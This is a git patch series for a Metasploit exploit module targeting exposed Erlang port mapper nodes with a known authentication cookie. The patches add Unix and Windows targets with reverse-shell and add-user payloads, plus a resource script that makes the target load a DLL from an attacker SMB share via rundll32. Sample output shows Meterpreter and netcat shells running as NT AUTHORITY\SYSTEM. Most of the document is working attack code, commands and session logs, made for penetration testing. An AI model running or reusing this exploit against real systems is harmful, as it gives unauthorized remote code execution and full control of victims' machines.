8a2a605a99eb323812a6a98654cde6611e52ea38 Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Tue, 18 Dec 2018 14:50:57 -0600 Subject: [PATCH 12/14] added targets --- .../exploit/multi/misc/erlang_cookie_rce.md | 110 ++++++++++-------- .../exploits/multi/misc/erlang_cookie_rce.rb | 22 +++- 2 files changed, 76 insertions(+), 56 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index e4ab90888baf..3f049ecdc2c1 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -12,21 +12,21 @@ 1. Install the Erlang Port Mapper Daemon 2. Install RabbitMQ 3. Start `msfconsole` - 4. Do `use exploit/unix/erlang_cookie_rce` + 4. Do `use exploit/multi/misc/erlang_cookie_rce` 5. Do `set RHOST ` 6. Do `set COOKIE ` - 7. Do set appropriate payload (Unix=cmd/unix/reverse, Windows=cmd/windows/generic) + 7. Do `set TARGET ` 8. Do `set LHOST ` - 9. `exploit` and verify shell is opened (varies per OS) + 9. `exploit` and verify shell is opened (if on windows login) ## Scenarios ### Ubuntu 16.04.5 LTS ``` -msf exploit(multi/erlang_cookie_rce) > options +msf exploit(multi/misc/erlang_cookie_rce) > options -Module options (exploit/multi/erlang_cookie_rce): +Module options (exploit/multi/misc/erlang_cookie_rce): Name Current Setting Required Description ---- --------------- -------- ----------- @@ -47,10 +47,10 @@ Exploit target: Id Name -- ---- - 0 Automatic Target + 0 Unix -msf exploit(multi/erlang_cookie_rce) > exploit +msf exploit(multi/misc/erlang_cookie_rce) > exploit [*] Started reverse TCP double handler on W.X.Y.Z:4444 [*] A.B.C.D:25672 - Receiving server challenge @@ -74,72 +74,80 @@ uid=122(rabbitmq) gid=130(rabbitmq) groups=130(rabbitmq) ### Windows 10 (Build 17134) +First we want to exploit the host, as an example adding a new user. (Payload is executed over cmd.exe) + ``` -msf exploit(multi/erlang_cookie_rce) > options +msf exploit(multi/misc/erlang_cookie_rce) > options -Module options (exploit/multi/erlang_cookie_rce): +Module options (exploit/multi/misc/erlang_cookie_rce): Name Current Setting Required Description ---- --------------- -------- ----------- - COOKIE MOLKLGXHWQLTGUREBDKI yes Erlang cookie to login with + COOKIE EXAMPLE yes Erlang cookie to login with RHOST A.B.C.D yes The target address RPORT 25672 yes The target port (TCP) -Payload options (cmd/windows/generic): +Payload options (cmd/windows/adduser): - Name Current Setting Required Description - ---- --------------- -------- ----------- - CMD \\W.X.Y.Z\BOB\t.exe yes The command string to execute + Name Current Setting Required Description + ---- --------------- -------- ----------- + CUSTOM no Custom group name to be used instead of default + PASS Wetw0rkHax0r$1 yes The password for this user + USER wetw0rk yes The username to create + WMIC false yes Use WMIC on the target to resolve administrators group Exploit target: Id Name -- ---- - 0 Automatic Target + 1 Windows -msf exploit(multi/erlang_cookie_rce) > exploit +msf exploit(multi/misc/erlang_cookie_rce) > exploit [*] A.B.C.D:25672 - Receiving server challenge [*] A.B.C.D:25672 - Sending challenge reply [+] A.B.C.D:25672 - Authentication successful, sending payload [*] Exploit completed, but no session was created. +``` + +Once exploitation is complete the tester can authenticate. Another method that can be used it SMB as shown below. + +exploit.rc -> +``` +use exploit/windows/smb/smb_delivery +set SHARE MSF +set TARGET 0 +exploit -j +use exploit/multi/misc/erlang_cookie_rce +set COOKIE EXAMPLE +set TARGET 1 +set RHOST A.B.C.D +set PAYLOAD cmd/windows/generic +set CMD "rundll32.exe \\\\W.X.Y.Z\MSF\test.dll,0" +exploit -j +``` + +``` +msf > resource exploit.rc +[*] Processing /root/exploit.rc for ERB directives. +[*] Exploit running as background job 0. +[*] Started reverse TCP handler on W.X.Y.Z:4444 +[*] Started service listener on W.X.Y.Z:445 +[*] Server started. +[*] Run the following command on the target machine: rundll32.exe \\W.X.Y.Z\MSF\test.dll,0 +[*] Exploit running as background job 1. +[*] A.B.C.D:25672 - Receiving server challenge +[*] A.B.C.D:25672 - Sending challenge reply +[+] A.B.C.D:25672 - Authentication successful, sending payload +[*] Sending stage (179779 bytes) to A.B.C.D +[*] Meterpreter session 1 opened (W.X.Y.Z:4444 -> A.B.C.D:51856) at 2018-12-18 14:45:02 -0600 +[*] Exploit completed, but no session was created. +msf exploit(multi/misc/erlang_cookie_rce) > sessions -i 1 +[*] Starting interaction with 1... ---- Impacket SMB Server --- -root@kali:/tmp# msfvenom -p windows/x64/shell_reverse_tcp LHOST=W.X.Y.Z LPORT=3 -f exe -o t.exe -[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload -[-] No arch selected, selecting arch: x64 from the payload -No encoder or badchars specified, outputting raw payload -Payload size: 460 bytes -Final size of exe file: 7168 bytes -Saved as: t.exe -root@kali:/tmp# impacket-smbserver BOB . -Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies - -[*] Config file parsed -[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 -[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 -[*] Config file parsed -[*] Config file parsed -[*] Config file parsed -[*] Incoming connection (A.B.C.D,50349) -[*] AUTHENTICATE_MESSAGE (\,DESKTOP-85258BS) -[*] User \DESKTOP-85258BS authenticated successfully -[*] :::00::4141414141414141 - ---- Handler --- - -root@kali:~# nc -lvp 3 -Listening on [0.0.0.0] (family 0, port 3) -Connection from A.B.C.D 50350 received! -Microsoft Windows [Version 10.0.17134.407] -(c) 2018 Microsoft Corporation. All rights reserved. - -C:\Users\667563~1\AppData\Roaming\RabbitMQ>whoami -whoami -nt authority\system - -C:\Users\667563~1\AppData\Roaming\RabbitMQ> +meterpreter > getuid +Server username: NT AUTHORITY\SYSTEM ``` diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 99b71263f8cb..3d000c19c295 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -20,7 +20,7 @@ def initialize(info = {}) }, 'Author' => [ - 'Daniel Mende', # discovery / blog post + 'Daniel Mende', # blog post article 'Milton Valencia (wetw0rk)', # metasploit module ], 'References' => @@ -29,9 +29,21 @@ def initialize(info = {}) ], 'License' => MSF_LICENSE, 'Platform' => ['unix', 'win'], + 'Arch' => ARCH_CMD, 'Privileged' => 'false', - 'Arch' => [ ARCH_CMD ], - 'Targets' => [[ 'Automatic Target', {} ]], + 'Targets' => + [ + [ 'Unix', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}, + ], + [ 'Windows', + 'Platform' => 'win', + 'Arch' => ARCH_CMD, + 'DefaultOptions' => {'PAYLOAD' => 'cmd/windows/adduser'}, + ] + ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 20, 2009', # https://github.com/erlang/otp/blob/master/lib/kernel/src/os.erl (history) ) @@ -67,7 +79,7 @@ def exploit send_name << "\x00\x05" # Version: R6 (5) send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) send_name << "#{our_node}" # @ - + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge send_challenge_reply = "\x00\x15" # Length: 21 send_challenge_reply << "\x72" # Tag: r @@ -82,7 +94,7 @@ def exploit send << "\x61" # SMALL_INTEGER_EXT send << "\x06" # Int: 6 send << "\x67" # PID_EXT (103) - send << "\x64\x00" # Node: + send << "\x64\x00" # Node: send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) send << "#{our_node}" # Node send << "\x00\x00\x00\x03" # ID From bb758f9a61de9ec2258b46210742b61be37f8b6f Mon Sep 17 00:00:00 2001 From: Milton-Valencia Date: Tue, 18 Dec 2018 14:55:12 -0600 Subject: [PATCH 13/14] I didn't forget msftidy I swear --- documentation/modules/exploit/multi/misc/erlang_cookie_rce.md | 2 +- modules/exploits/multi/misc/erlang_cookie_rce.rb | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index 3f049ecdc2c1..2743af852906 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -113,7 +113,7 @@ msf exploit(multi/misc/erlang_cookie_rce) > exploit [*] Exploit completed, but no session was created. ``` -Once exploitation is complete the tester can authenticate. Another method that can be used it SMB as shown below. +Once exploitation is complete the tester can authenticate. Another method that can be used is SMB as shown below. exploit.rc -> ``` diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 3d000c19c295..ef29c683a9d2 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -79,7 +79,7 @@ def exploit send_name << "\x00\x05" # Version: R6 (5) send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) send_name << "#{our_node}" # @ - + # SEND_CHALLENGE_REPLY: return generated digest and its own challenge send_challenge_reply = "\x00\x15" # Length: 21 send_challenge_reply << "\x72" # Tag: r @@ -94,7 +94,7 @@ def exploit send << "\x61" # SMALL_INTEGER_EXT send << "\x06" # Int: 6 send << "\x67" # PID_EXT (103) - send << "\x64\x00" # Node: + send << "\x64\x00" # Node: send << [(our_node.length).to_s(16)].pack('H*') # Length: strlen(Node) send << "#{our_node}" # Node send << "\x00\x00\x00\x03" # ID From 5bfdc7009c5e12194c773464ce7aa5da4bea6df9 Mon Sep 17 00:00:00 2001 From: Jacob Robles Date: Wed, 19 Dec 2018 07:58:32 -0600 Subject: [PATCH 14/14] Minor Doc Changes --- .../modules/exploit/multi/misc/erlang_cookie_rce.md | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md index 2743af852906..7c842a2c5a6c 100644 --- a/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md +++ b/documentation/modules/exploit/multi/misc/erlang_cookie_rce.md @@ -1,11 +1,11 @@ ## Vulnerable Application The [Erlang Port Mapper Daemon](https://www.erlang.org/) is used to coordinate distributed erlang - instances. Should an attacker gain access to this cookie code execution is trivial. Normally this + instances. Should an attacker get the authentication cookie code execution is trivial. Normally this cookie can be found in the home directory as ".erlang.cookie", however it varies system to system - as well as it's configuration. As an example on a Windows 10 instance it can be found under the - users home directory: e.g "C:\Users\\.erlang.cookie". Code execution is achieved via the - "os:cmd('cmd')." command + as well as its configuration. As an example on a Windows 10 instance it can be found under the + users home directory: e.g `C:\Users\\.erlang.cookie`. Code execution is achieved via the + `os:cmd('cmd').` command ## Verification Steps @@ -116,6 +116,7 @@ msf exploit(multi/misc/erlang_cookie_rce) > exploit Once exploitation is complete the tester can authenticate. Another method that can be used is SMB as shown below. exploit.rc -> + ``` use exploit/windows/smb/smb_delivery set SHARE MSF